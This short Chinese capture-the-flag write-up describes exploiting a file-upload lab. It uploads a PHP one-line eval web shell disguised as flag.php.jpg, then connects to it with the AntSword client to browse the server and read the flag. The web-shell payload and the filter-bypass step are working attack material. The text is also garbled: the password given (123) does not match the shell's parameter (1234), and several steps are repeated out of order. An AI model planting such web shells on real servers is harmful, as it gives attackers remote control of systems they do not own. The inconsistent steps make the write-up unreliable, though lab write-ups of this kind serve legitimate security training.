题目
1.打开靶机
随便上传一个图片,查看get请求发现**/upload/XXX.jpg**
2.创建一个脚本文件
命名为flag.php.jpg,并上传
脚本文件内容:
<?php @eval($_POST[1234])?>
3上传后复制文件get请求的链接并打开蚁剑
连接密码为123
双击链接
4,查找'/'在最下面找到flag文件
5,打开文件得到flag
随便上传一个图片,查看get请求发现**/upload/XXX.jpg**
命名为flag.php.jpg,并上传
脚本文件内容:
<?php @eval($_POST[1234])?>
连接密码为123
双击链接